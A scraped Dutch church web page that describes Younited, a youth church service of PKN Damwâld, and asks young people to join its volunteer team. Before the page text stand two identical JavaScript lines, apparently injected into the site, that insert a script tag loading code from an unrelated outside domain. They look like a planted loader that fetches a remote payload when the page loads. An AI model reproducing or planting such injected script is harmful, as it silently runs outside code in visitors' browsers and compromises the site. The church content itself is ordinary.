;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Younited jeugdkerk - PKN Damwâld
Younited jeugdkerkYounited: een kerk voor jongeren!

Younited… een kerk, maar dan anders! Een event voor jongeren met verschillende achtergronden, die met elkaar samenkomen en de boodschap van God uit willen dragen. Vier keer per jaar is er een jeugddienst waarin verschillende onderwerpen worden aangehaald die met het geloof te maken hebben. Elke dienst is er een leuke band bij en is er een spreker die door middel van een kort praatje het onderwerp nader toelicht.

De onderwerpen die naar voren komen zijn elke keer anders, maar hebben als gemeenschappelijke deler dat ze allemaal het geloof belichten. Steeds weer van een andere hoek en met een andere invulling wordt het Evangelie van Jezus toegankelijk gemaakt. Door dit op een laagdrempelige manier te doen, willen we iedereen kennis laten maken met de boodschap van Jezus.

Younited is laagdrempelig voor jongeren die zoekend zijn naar God en zeker uitdagend voor jongeren die al Christen zijn! Geloven is niet saai omdat je een heleboel dingen niet zou mogen. Geloven is relevant, uitdagend en van belangrijkste meerwaarde voor je leven!

Bovenal zijn de diensten ook gewoon heel gezellig! Er is muziek, actie, een praatje dat er toe doet, creatieve expressie en vriendschap. Een opzet die voor iedereen heerlijk begrijpelijk en toegankelijk is. Om elkaar te ontmoeten, te vieren en na te denken. Een plek om met elkaar te lachen, te discussiëren en naar elkaar te luisteren.

Younited wil een ‘smeltkroes’ zijn voor een eigentijdse invulling van de boodschap van liefde die door Jezus nadrukkelijk in de wereld is gebracht. Een boodschap die bijdraagt aan wederzijds respect, aan het toepasbaar krijgen van de Bijbel in ons dagelijks leven en die de mogelijkheid biedt om Jezus te leren kennen.
Wil je weten wanneer de eerstvolgende Younited plaatsvindt, kijk dan in de agenda. Volg ons ook op Facebook en je kunt ons mailen: klik hier 

Wie zijn Younited

De organisatie

Younited bestaat uit een groep jongeren van 18 tot 30 jaar die samen de gehele dienst voorbereiden. Zo is er een groepje die de band en de spreker benaderd, een bouwploeg die de eventuele decors voor het toneel maakt en is er een toneelgroep die de sketches opvoert. Dan is er nog een groep die het technische deel voor zijn rekening neemt, zij bedienen de beamer en de camera’s en houden de social media-pagina’s up to date.

Doe mee!

Lijkt het je leuk om het team van Younited te komen versterken? Vind je het bijvoorbeeld leuk om toneel te spelen, houd je ervan om leuke muziek uit te zoeken van de dienst of ben je handig met een computer? Neem dan contact met ons op!

Younited Agenda
Mee helpen?

Lijkt het jouw leuk om mee te helpen bij het organiseren van een jeugddienst?

Neem contact op!